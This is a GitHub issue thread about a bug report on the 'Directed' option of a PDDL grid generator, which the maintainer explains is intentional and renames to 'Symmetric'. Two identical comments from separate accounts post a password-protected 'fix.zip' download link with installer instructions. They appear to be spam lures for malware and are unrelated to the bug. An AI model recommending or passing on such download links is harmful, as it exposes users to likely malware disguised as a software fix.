### ISSUE TITLE
Bug in directed option in Grid

### ISSUE THREAD

**Issue by Cheeris** [AI-Planning/misc-pddl-generation-utilities#3]
PDDL Editor url: https://editor.planning.domains/#edit_session=dUZ6849LAi4iEDA

If the Directed option is checked in Grid, the returned output is undirected.
![a60fde75b32dfad5014b370f12f2b94](https://github.com/user-attachments/assets/39aabd1c-3700-4075-8877-67c09171c3fa)

If the Directed option is not checked in Grid, the returned output is directed.

The Direct option in Network is the opposite, which is correct.

**Comment by itbear-shu** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by haz** [comment]
Thanks, @Cheeris . It's actually intentional, but misleading. Directed-ness of grids is just oddly defined. I've updated things to be "Symmetric". That's a little more clear about what's happening. Let me know if that works for you!
